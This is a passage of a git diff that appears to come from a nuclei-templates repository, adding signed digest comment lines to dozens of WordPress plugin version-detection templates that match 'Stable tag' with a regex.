http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e6cf138adbd78aa039973fbecea9b3cbe85ef72360799dcdcf79646da507d01c022100dfa2b97cef7d6ba28cfb9138d309964a671d70d86b2cd53b90cd4aff874a2999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..b08e376d8b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cddd9f50fcdc2cf780f85795ac2e71c47329a677f01adeec4850b44a6484129c022100ac5886e0d8d97073cb86d3d033660b90402050ed51081cde6980b804e9e6ff80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..4f9719a7ec 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a93d9de20c921a544340c5726fb5cb5615b014a11188f881df297fe9f6451b0d022100d65ae59f5d74e832c40090ce0fb9ac9c8517b692064caeeaae153e75037cac85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..aa65d6bace 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ae226f3b66df21e4d695137b54dc9809a2d4ebdc7a6c5414a656986d2493ebf022100ffacd2886fb9ee13cb67abf5f37d1cb4ddf48ac41df7a0ad001f7e456b5f211c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..94b9c1d263 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba46ff4ee69ebcf6f199650056d603cf8c32c53e1ee0654c6877e7916387df4d02205a1dd5c0bdbbf3a5fa51de4bb8abbf9be0f9515976a7fffd741a43a1c520bb91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..8bdf0be87b 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fa43e8644921d4aec78b240a750a627071f16125d9f58a733423ec006c83ee1022100a0f2239253b4f2da99d48c2017ddf20d3384eac24098e7db6bc5366b25d048c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..7257d477cf 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201b9815327fb3620bab3de15db0841c69d1833278844fb07d2130ca5d3e551bb4022100fe464ce7052a71f9a0d241f04c2ccd37da9fe1173226b4fb8dcbfb57ca56b0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..8184660e76 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ca9cff48e9ac09028754adf55a152ebc4d18e49a81fc1ac0e0f2b2ab61d07b8022100ca531d8ac2ee0361a619c9b06af25d30c7f3f8feecec434f8b3236f5af7b1595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..23ddd131aa 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204121adeeb69a6c95d02735668e51fbd26ad026fce793ab901d13449428dd441b02207535a4510c012d2b44c5dfedab842bc5cc0ed57a267f1e58a70beccbd1c968b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..f88a905a88 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091d9b57d33b5c0ede36885420d665beb09cc1199909d1b45e02aa47ea43638d9022021e8166b9a9a4daae3f9708eeee5c0ffdcc390d76a232dcd388c51d4dba32621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..7cb3695336 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c721b84bbd5dcf8bb773ab94b02a3b1c7276e640d0d2aa99cd524f4c64ce9e0a022100b41962dc5966e999c9b69fa8bc95c8d0aaf866e5e3984919764411c04366c1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..f59c83ca5e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb39820bb0b8d524e3f09cc3a4181ba8f75c1ed6eb625204f6940cfd17fe98e4022100ff5bd5be06ef876e4e0fbc1eac7209b8aff1f831ff3f050be9ac4387c7a73dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..ada5b3ddd7 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1f74c38384e457daf668db1ec6a854f62d0ec524780896a3a80d56812c83da7022100a8f558d87b5118647dc9ea530cdc496461dcd299b758cd22968a490b0f0cc6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..eef0ea856b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204044a5ff857e22d148956762612049200436ea75b28ba588538f21bf089766ba02210094614fcd50e39b43cff0134a9d15ffa773f727d543481f158c0cc60eb9b0fc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..12ff068618 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099ef57e349ae942e5d615aa3439a3bc8c86dfd42dd338a91dac3d82b276213140221009f5bd33428e53e45cfb62a23de1669aadf5d79660ebd14f851452f044b96b993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..a036c1d606 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f020f54d14d4788e806403dc37711f65b10e73e66616647cf3c3194d9902c8c8022100e266eb6dc98fbf0923bbae89adb816e30d3c27fcc96d19f55deb8683a44eb9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..85d17ebfef 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7adec5b77714a3c018004db64636a76a21db9fa943449916a2f6f2ed45daa5d02210089a322231d7d470f89cc4575a5db17806fd05fadb8a8a87424b447679afc23f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..d8020d4aa5 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e4d4db4d98e9582ff1adde589e1825e086f7d112a20b0106c4f6adba18c9a473022077a28726120bfe707c198105e609a5c5b1482f7e7c04cdf1f2038e1ada387d1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..48dba869cb 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd6c70c75f8dc2d5290b80ac0057db8f260b3ec5da6a29681f2d526cbaa4979b02200edb5f57b5d284e91857b4b7d7884c88d83c925e95c0d2d82d6160d67572979d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..a66d1e3945 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a439d5e89523765aee4208decdbcd507626aee8afc4fd2df7e652ff184134854022100f55b40e242e7b7037c0449fecbda9e6f9b6d70228936c09d42eeb6b25ea08d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..68b04a284d 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022041dfde43d1c66addaf90718c188d52906555b7fd999dbab6758af8d1611eb25c0220484e254a10a88ab6719fc638b33f9e14dab6dddccf37f36b8277ae782762e86e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..557e496b27 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087169ebac4b9ca1b8aeff2615ead26305dbdd9ae3f70a7ff96bbdd0328439938022100fa9a20f8a39ca34a92a4666cf5238038bc53b5abad50f3b1e19f2f22a68c7d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..254ec5cbea 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060ea183d7713f69fa5ba2a4cc4fe9419ee51a8ae6151a0c4f76591e8c0b68ebf022100a60980a15543346d83d684435fd1835fc10c2ac6dabb38f5f11a657602981643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..df91c9e24c 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202bd691e52c3e4490ff9b2fa7888eab0b5e8b7e0309a513764bf10bd0ac642e61022006781f4a366604ea2775d8e86991d8fd9e1bff65c1654829ef5bccac4851788f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..d15c73c0b3 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206fc9d896e91dbb88b4a40d350910a1a309dc454b1048d282f23b6b768731fc2302204096021f762ea1a4c523cfe5666fc7f3a1bd9957fa67bbc3faa3c673d5761eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..a35ca4b3fe 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d5c0387b6e710f5fec0826c63f7b8d93091f1d8ba9260e9ca322a3b623d78e4022100f4e61b4d0c662f0944c654681d2d1306fd84d0065c215f406700a920e4a0b221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..d97e7d5688 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ce3551d122aa4c328639f0f43b2ae96e77847ea890ff65173eefd493e4fb0b202201fa291113795c0f16437e4f4e131da0a6cf7876763cdf767745581501d01a6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..2b01095ff6 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220731776c5c27a3192df697030223a2896acbcfcec3466ab3b77d834d4fc92e75b022100a6faa469fcd28e4d3f179319dfc707aae868697442a7485fbbaf8dd12e3d7913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..9743edbeaa 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009efdb58875b332591ddcb96a12d85a01de34dfb321b02804de3144e8b697a670022000c03845a8e5d3cde4ab362c21efade3717a36d7e3257a12faed3632afe865ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..9dd86ea251 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207631d17beb75b5be656bebe3e0ed79e4016e6c1e034251fc30f3d1604c55583302203e0ae207b711cfa5f9d2aea49c6771c3fd14753b89e32fef272e4b5926980bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..5f4576fe31 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5d2dfa6cf83a3b3bfdc9ee1d3c8d0324fc115f166e2350a41b7e13ead53f9de0220506795df82b9147221efd3b709712a8c6120d3d164db6f1ccc9f7f7a261da54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..78e2fb4302 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015b6fc223115d127300980b7602d96a3141cc263c5bb50dac11b74d8acc56a69022100ca1f9e17a39d5eea6567e338791abfa84f05c294646b29d168ef55b6ac51cdee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..5faab2db0d 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071f5c4c8ce92ec8764e3ac33112cd39354daf843ba308aa4d3cacebfd5236e2c022100f87207f817f8b1d1e47166e78a25b9300e68bb6054bb27bee9c5a2da904df844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..2313894e98 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b10b3f4185c3b9b0ffb7daf63675149b040cb606d8a80f24ddaab3b64592ddc022100c3f93c81960c6557abed82c33899389ad2f835953e8c885ec5c6dfdda05db905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..f7d77df970 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e8851a9b15cb154917ffbada86bff5ad8a873f925587fdc49a0dc005d107293022100d350a4fe18b395f0a4c22e2f823b639e06982aae2527db13ec49854964aa5582:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..587c9c94ca 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203913d9222300df7f41c5ddda8d9ab04cfb311b28f91e1a50182632108d5405f7022100ba7c9fb01982c4353fc148033dc82fb4dae2eac376b01b184c408c17f06e5da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..3dbde24eb4 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013647ce5f29184f931eebf9ca7177e3cb1af89cd8c3ed67161f3ee174380d7550220616d4a63c7262fbb5a8bd1d6692d3eac79e423623acfe99f6a747b7a985dff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..39d32eee1b 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220043179ed225c88e9fcc2ce00fadcc86228f14cce574c82dc24fa4ff3c2ff06690221009f7f5bab38c24626d53b0d1bf9b52bfdb3250d4b95dde1e7e040fdc289b023dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..879393f5ee 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220070816f3240ef69df7d936fe2dadbc4ce3677fb0502304fa93c14579255779b0022100b56b425770d8e7c2686ba214879a1d1d27e72b7659d729704fe1c2e02aebf9e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..f8731c5e9b 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013c341c62150e1f9e3cb11dd855ff49312273239ffc25bf267f62f61e3c7ee19022100aa17ab12b5db31853083c395dcab34ce8ddd275cf39b0c381dc39ac82d6630e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..80a4ca1780 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001bd395a0ecb023dfeb3924abae0be085e05d5087e8327996a20dda26b041f1c0221008510392731f90c8726cb27574549fcddde0e997ce9f71f64ffc64bcf2b147707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..c4ed88f378 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202dc7ca5a08b2b979f04fdf51557c32bdd43d6c7239c92f32ff55c142c014bcc4022100d831b76d4eb506286a6ebab8c96c1cd6c050d7ba8a4edde1869a4e3862f8c968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..18cea6ae36 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f22ffe02488941a95d1d11f3250bfabe5e6e519ebdea1749363aa3fa3890239022019d6f59168e2b32c12a6aadb4d628d5c25f0e18d98896c4d624ccfcf85133950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..a198e2f614 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220397e60c1b21ef7797be7230d69404053500b419ec1d4d5ce61eb4e449275db4d022100c5cb76c3c3e06a4cf069e2e7465cd994ac7f1cf184b46259a5e3430ac2238ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..f2956522de 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7ed9247e09869852c91cd9699b50eb41aa00cdad5d19a050ae0335afb37e4ef02205bebed887b0bf5c919be424eaa8e3d17a884dd6219afac032b5bdf002e818a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..3c010cf704 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220669268d292b3f030a39d19dad5e745386be4ad6555c10882388f130c92bd363002205ede32b5a8a5c61e795240d80e8a31f8435c0b4f0cbbee3cf8724dfc90a87c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..4cd2c6c146 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200460c92e2ec6c3ada342f7fa52df64fbaf732a64d19c04bbe4d8f9c8215ad1b9022100b49994334aaa084884766492e468789b0e8c7249067ec1d40fa2a100de051cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 